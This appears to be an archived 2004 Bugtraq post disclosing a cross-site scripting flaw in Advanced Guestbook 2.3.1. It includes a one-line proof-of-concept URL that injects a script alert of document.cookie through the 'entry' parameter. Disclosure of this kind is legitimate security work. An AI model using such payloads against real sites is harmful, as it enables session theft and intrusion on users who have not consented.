[37590] in bugtraq
Advanced Guestbook
daemon@ATHENA.MIT.EDU (Emile van Elen)
Fri Dec 3 04:33:57 2004
Message-ID: <8ea2ac2004120211406650777b@mail.gmail.com>
Date: Thu, 2 Dec 2004 20:40:21 +0100
From: Emile van Elen <emile.van.elen@gmail.com>
Reply-To: Emile van Elen <emile.van.elen@gmail.com>
To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
There's a XSS in Advanced Guestbook 2.3.1
For example:
index.php?entry=<script>alert(document.cookie)</script>
greetings,
--
Emile van Elen